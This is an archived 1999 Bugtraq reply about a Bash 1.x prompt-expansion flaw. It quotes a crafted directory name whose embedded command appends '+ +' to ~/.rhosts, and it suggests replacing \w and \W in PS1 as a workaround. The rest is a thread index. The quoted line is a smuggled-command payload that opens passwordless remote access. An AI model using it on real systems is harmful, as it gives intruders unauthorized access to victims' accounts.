Bugtraq mailing list archives

Re: Bash Bug

From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Thu, 22 Apr 1999 11:16:06 +0200


On Tue, 20 Apr 1999, Shadow wrote:

mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "


Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
seem to be vulnerable. Anyway, there's a hope even for those who want to
stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!"

Current thread:

Corrected Linux 2.2.5 FIN/NULL/XMAS block patch, (continued)
- - - Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 19)
    - Re: Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 20)
    - Re: Plain text passwords--necessary Taral (Apr 19)
  - Re: Plain text passwords--necessary Trevor Schroeder (Apr 19)
    - bug in ssh allowing to be invissible Grzegorz Stelmaszek (Apr 19)
    - Re: bug in ssh allowing to be invissible Pete (Apr 20)
    - Re: bug in ssh allowing to be invissible Joe Gross (Apr 20)
    - NetBSD Security Advisory 1999-009 matthew green (Apr 20)
    - Bash Bug Shadow (Apr 20)
    - Re: Bash Bug Marc Lehmann (Apr 21)
    - Re: Bash Bug Pavel Kankovsky (Apr 22)
    - Re: Bash Bug Chet Ramey (Apr 22)
    - L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
    - Re: Plain text passwords--necessary Densin Roy. (Apr 19)
    - Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
    - AOL Instant Messenger URL Crash Adam Brown (Apr 19)
    - Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
    - Shopping Carts exposing CC data Joe (Apr 19)
    - Re: Shopping Carts exposing CC data Joe (Apr 20)
    - Outlook 98 allows spoofing internal users Nate Lawson (Apr 20)
    - Re: Outlook 98 allows spoofing internal users Peter van Dijk (Apr 25)

(Thread continues...)